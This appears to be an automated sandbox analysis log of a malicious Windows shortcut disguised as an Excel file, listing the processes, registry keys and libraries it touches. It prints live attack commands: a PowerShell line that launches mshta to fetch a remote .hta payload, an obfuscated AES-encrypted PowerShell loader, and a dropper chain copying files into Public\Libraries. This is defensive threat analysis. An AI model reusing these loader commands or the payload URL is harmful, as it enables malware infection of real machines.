                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear,23_2_004019F0
                    Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\yt[1].htaJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7696:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3720:120:WilError_03
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bx55tq2v.0tl.ps1Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\UcvuiswbO.bat" "
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCommand line argument: 08A23_2_00413780
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCommand line argument: 08A23_2_00413780
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCommand line argument: 08A23_1_00413780
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCommand line argument: 08A25_2_00413780
                    Source: C:\Users\user\AppData\Roaming\uc.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress);$MtMSBjEhy.CopyTo( $wDjFzJY );$MtMSBjEhy.Close();$DaRjcu.Close();[byte[]] $dVtmfGSE = $wDjFzJY.ToArray();$ghWDGW = [System.Text.Encoding]::UTF8.GetString($dVtmfGSE);$ghWDGW | powershell -@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques" # Keyword tags to help users find this module
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                    Source: FT. 40FE CNY .xlsx.lnkReversingLabs: Detection: 31%
                    Source: FT. 40FE CNY .xlsx.lnkVirustotal: Detection: 24%
                    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" .(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')https://www.sessosesso.it/assets/aw/yt.hta
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://www.sessosesso.it/assets/aw/yt.hta
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $OsFNkdw = 'AAAAAAAAAAAAAAAAAAAAAOeGa50V5wUO7zHydkcFZbJINq4P3H3RMsqOZX56v9Ct1bZUtRZkWxrChczJINV9leAt1ry1WLWkiFuSzfzQFE/yWmqaDZXsneytUPY+5le4m5eM4W+YWzERSnn/urcy8+ZTG58q1h/+BzdOb3w2O1z7QWzthSNzGxOWWNyV7TmYXZCKVR/W4Wq5ilvQCut+dsc1oHeaxo3nDd5I7/VZnRBIlxsN6HcNAACtlxfRiNFMSkDcN8+7W2lqhnFd5fXX+lgvrRG0ld6mdkV9WDBX6QjfiDRmhCmcLWUj1Bf5MNMwFNO28V0dG8tS2l8mIOdvR6aZF2v7aj+0KYrMlbdDhYWFi7OKVRA/3XZLlb5bbQDQE0oOT0JAi3+7gTkWesgJWCHgEueWTWqAMCB6A7qRzrsbpayqU/WAl9/nKC9cB9JhUjr2ITV9Ek3kErAD+eAPojoNd7bQuKjVE9tLoDwyPKo7YLWXTQF8wgZm0Ja3MfKMwkGLjtfBjT7ucygj4kLX/Zk01swB2YhhmuTYGe58LHZYGFngyyCQTKG4k9tN5i5bStEsFZehOTKeivaD+CKVo0hL0r5uz5GQB2ew8dGCUwkPmeXZvkk4B1gaPU3SmBdkVfrvuhGsjc5t6HhSZTvvp6Jz9v2fJj6ahm37dhgqwqsOIhz9dfUsra5c/+Avs0Ho38MGy4FjkP6OU6wM3P9BykwtvTRUlAfl604CotxxEOc6gE6TRnaarDiD6zmwY1sYkKEtTlG2JS0b7n2FWA1GsA==';$JIfveZK = 'cFRkUGZlWWl4R2ZHdlp1WlRocFlZR3RFVUtmamhETUc=';$UGIWRBAh = New-Object 'System.Security.Cryptography.AesManaged';$UGIWRBAh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$UGIWRBAh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$UGIWRBAh.BlockSize = 128;$UGIWRBAh.KeySize = 256;$UGIWRBAh.Key = [System.Convert]::FromBase64String($JIfveZK);$VpSlE = [System.Convert]::FromBase64String($OsFNkdw);$uBmStTPL = $VpSlE[0..15];$UGIWRBAh.IV = $uBmStTPL;$cLYZAvcnc = $UGIWRBAh.CreateDecryptor();$eVtPpVFwq = $cLYZAvcnc.TransformFinalBlock($VpSlE, 16, $VpSlE.Length - 16);$UGIWRBAh.Dispose();$DaRjcu = New-Object System.IO.MemoryStream( , $eVtPpVFwq );$wDjFzJY = New-Object System.IO.MemoryStream;$MtMSBjEhy = New-Object System.IO.Compression.GzipStream $DaRjcu, ([IO.Compression.CompressionMode]::Decompress);$MtMSBjEhy.CopyTo( $wDjFzJY );$MtMSBjEhy.Close();$DaRjcu.Close();[byte[]] $dVtmfGSE = $wDjFzJY.ToArray();$ghWDGW = [System.Text.Encoding]::UTF8.GetString($dVtmfGSE);$ghWDGW | powershell -
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\uc.exe "C:\Users\user\AppData\Roaming\uc.exe"
                    Source: C:\Users\user\AppData\Roaming\uc.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\UcvuiswbO.bat" "
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\uc.exeProcess created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\AppData\Roaming\uc.exe C:\\Users\\Public\\Libraries\\Ucvuiswb.PIF
                    Source: C:\Users\user\AppData\Roaming\uc.exeProcess created: C:\Users\Public\Libraries\bwsiuvcU.pif C:\Users\Public\Libraries\bwsiuvcU.pif
                    Source: unknownProcess created: C:\Users\Public\Libraries\Ucvuiswb.PIF "C:\Users\Public\Libraries\Ucvuiswb.PIF"
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFProcess created: C:\Users\Public\Libraries\bwsiuvcU.pif C:\Users\Public\Libraries\bwsiuvcU.pif
                    Source: unknownProcess created: C:\Users\Public\Libraries\Ucvuiswb.PIF "C:\Users\Public\Libraries\Ucvuiswb.PIF"
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFProcess created: C:\Users\Public\Libraries\bwsiuvcU.pif C:\Users\Public\Libraries\bwsiuvcU.pif
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://www.sessosesso.it/assets/aw/yt.htaJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $OsFNkdw = 'AAAAAAAAAAAAAAAAAAAAAOeGa50V5wUO7zHydkcFZbJINq4P3H3RMsqOZX56v9Ct1bZUtRZkWxrChczJINV9leAt1ry1WLWkiFuSzfzQFE/yWmqaDZXsneytUPY+5le4m5eM4W+YWzERSnn/urcy8+ZTG58q1h/+BzdOb3w2O1z7QWzthSNzGxOWWNyV7TmYXZCKVR/W4Wq5ilvQCut+dsc1oHeaxo3nDd5I7/VZnRBIlxsN6HcNAACtlxfRiNFMSkDcN8+7W2lqhnFd5fXX+lgvrRG0ld6mdkV9WDBX6QjfiDRmhCmcLWUj1Bf5MNMwFNO28V0dG8tS2l8mIOdvR6aZF2v7aj+0KYrMlbdDhYWFi7OKVRA/3XZLlb5bbQDQE0oOT0JAi3+7gTkWesgJWCHgEueWTWqAMCB6A7qRzrsbpayqU/WAl9/nKC9cB9JhUjr2ITV9Ek3kErAD+eAPojoNd7bQuKjVE9tLoDwyPKo7YLWXTQF8wgZm0Ja3MfKMwkGLjtfBjT7ucygj4kLX/Zk01swB2YhhmuTYGe58LHZYGFngyyCQTKG4k9tN5i5bStEsFZehOTKeivaD+CKVo0hL0r5uz5GQB2ew8dGCUwkPmeXZvkk4B1gaPU3SmBdkVfrvuhGsjc5t6HhSZTvvp6Jz9v2fJj6ahm37dhgqwqsOIhz9dfUsra5c/+Avs0Ho38MGy4FjkP6OU6wM3P9BykwtvTRUlAfl604CotxxEOc6gE6TRnaarDiD6zmwY1sYkKEtTlG2JS0b7n2FWA1GsA==';$JIfveZK = 'cFRkUGZlWWl4R2ZHdlp1WlRocFlZR3RFVUtmamhETUc=';$UGIWRBAh = New-Object 'System.Security.Cryptography.AesManaged';$UGIWRBAh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$UGIWRBAh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$UGIWRBAh.BlockSize = 128;$UGIWRBAh.KeySize = 256;$UGIWRBAh.Key = [System.Convert]::FromBase64String($JIfveZK);$VpSlE = [System.Convert]::FromBase64String($OsFNkdw);$uBmStTPL = $VpSlE[0..15];$UGIWRBAh.IV = $uBmStTPL;$cLYZAvcnc = $UGIWRBAh.CreateDecryptor();$eVtPpVFwq = $cLYZAvcnc.TransformFinalBlock($VpSlE, 16, $VpSlE.Length - 16);$UGIWRBAh.Dispose();$DaRjcu = New-Object System.IO.MemoryStream( , $eVtPpVFwq );$wDjFzJY = New-Object System.IO.MemoryStream;$MtMSBjEhy = New-Object System.IO.Compression.GzipStream $DaRjcu, ([IO.Compression.CompressionMode]::Decompress);$MtMSBjEhy.CopyTo( $wDjFzJY );$MtMSBjEhy.Close();$DaRjcu.Close();[byte[]] $dVtmfGSE = $wDjFzJY.ToArray();$ghWDGW = [System.Text.Encoding]::UTF8.GetString($dVtmfGSE);$ghWDGW | powershell -Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\uc.exe "C:\Users\user\AppData\Roaming\uc.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\UcvuiswbO.bat" "Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeProcess created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\AppData\Roaming\uc.exe C:\\Users\\Public\\Libraries\\Ucvuiswb.PIFJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeProcess created: C:\Users\Public\Libraries\bwsiuvcU.pif C:\Users\Public\Libraries\bwsiuvcU.pifJump to behavior
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFProcess created: C:\Users\Public\Libraries\bwsiuvcU.pif C:\Users\Public\Libraries\bwsiuvcU.pif
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFProcess created: C:\Users\Public\Libraries\bwsiuvcU.pif C:\Users\Public\Libraries\bwsiuvcU.pif
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: mlang.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
